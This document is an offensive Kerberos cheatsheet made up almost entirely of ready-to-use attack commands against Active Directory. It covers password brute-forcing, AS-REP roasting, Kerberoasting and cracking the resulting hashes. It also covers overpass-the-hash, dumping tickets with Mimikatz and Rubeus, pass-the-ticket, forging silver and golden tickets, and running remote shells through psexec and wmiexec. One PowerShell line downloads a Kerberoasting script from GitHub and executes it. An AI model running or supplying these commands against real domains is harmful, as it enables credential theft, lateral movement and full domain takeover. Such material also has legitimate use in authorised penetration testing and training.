Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

  1. python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

  1. # with a list of users
  2. .\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
  3. # check passwords for all users in current domain
  4. .\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

ASREPRoast

With Impacket example GetNPUsers.py:

  1. # check ASREPRoast for all domain users (credentials required)
  2. python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
  3. # check ASREPRoast for a list of users (no credentials required)
  4. python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

With Rubeus:

  1. # check ASREPRoast for all users in current domain
  2. .\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

Cracking with dictionary of passwords:

  1. hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
  2. john --wordlist=<passwords_file> <AS_REP_responses_file>

Kerberoasting

With Impacket example GetUserSPNs.py:

  1. python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

With Rubeus:

  1. .\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

With Powershell:

  1. iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
  2. Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Cracking with dictionary of passwords:

  1. hashcat -m 13100 --force <TGSs_file> <passwords_file>
  2. john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>

Overpass The Hash/Pass The Key (PTK)

By using Impacket examples:

  1. # Request the TGT with hash
  2. python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
  3. # Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
  4. python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
  5. # Request the TGT with password
  6. python getTGT.py <domain_name>/<user_name>:[password]
  7. # If not provided, password is asked
  8. # Set the TGT for impacket use
  9. export KRB5CCNAME=<TGT_ccache_file>
  10. # Execute remote commands with any of the following by using the TGT
  11. python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  12. python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  13. python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

With Rubeus and PsExec:

  1. # Ask and inject the ticket
  2. .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
  3. # Execute a cmd in the remote machine
  4. .\PsExec.exe -accepteula \\<remote_hostname> cmd

Pass The Ticket (PTT)

Harvest tickets from Linux

Check type and location of tickets:

  1. grep default_ccache_name /etc/krb5.conf

If none return, default is FILE:/tmp/krb5cc_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being KEYRING tickets, you can use tickey to get them:

  1. # To dump current user tickets, if root, try to dump them all by injecting in other user processes
  2. # to inject, copy tickey in a reachable folder by all users
  3. cp tickey /tmp/tickey
  4. /tmp/tickey -i

Harvest tickets from Windows

With Mimikatz:

  1. mimikatz # sekurlsa::tickets /export

With Rubeus in Powershell:

  1. .\Rubeus dump
  2. # After dump with Rubeus tickets in base64, to write the in a file
  3. [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

To convert tickets between Linux/Windows format with ticket_converter.py:

  1. python ticket_converter.py ticket.kirbi ticket.ccache
  2. python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

With Impacket examples:

  1. # Set the ticket for impacket use
  2. export KRB5CCNAME=<TGT_ccache_file_path>
  3. # Execute remote commands with any of the following by using the TGT
  4. python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  5. python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  6. python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using ticket in Windows

Inject ticket with Mimikatz:

  1. mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

  1. .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

  1. .\PsExec.exe -accepteula \\<remote_hostname> cmd

Silver ticket

With Impacket examples:

  1. # To generate the TGS with NTLM
  2. python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
  3. # To generate the TGS with AES key
  4. python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
  5. # Set the ticket for impacket use
  6. export KRB5CCNAME=<TGS_ccache_file>
  7. # Execute remote commands with any of the following by using the TGT
  8. python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  9. python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  10. python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

With Mimikatz:

  1. # To generate the TGS with NTLM
  2. mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
  3. # To generate the TGS with AES 128 key
  4. mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
  5. # To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
  6. mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
  7. # Inject TGS with Mimikatz
  8. mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

  1. .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

  1. .\PsExec.exe -accepteula \\<remote_hostname> cmd

Golden ticket

With Impacket examples:

  1. # To generate the TGT with NTLM
  2. python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
  3. # To generate the TGT with AES key
  4. python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
  5. # Set the ticket for impacket use
  6. export KRB5CCNAME=<TGS_ccache_file>
  7. # Execute remote commands with any of the following by using the TGT
  8. python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  9. python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
  10. python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

With Mimikatz:

  1. # To generate the TGT with NTLM
  2. mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
  3. # To generate the TGT with AES 128 key
  4. mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
  5. # To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
  6. mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
  7. # Inject TGT with Mimikatz
  8. mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

  1. .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

  1. .\PsExec.exe -accepteula \\<remote_hostname> cmd

Misc

To get NTLM from password:

  1. python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'

Tools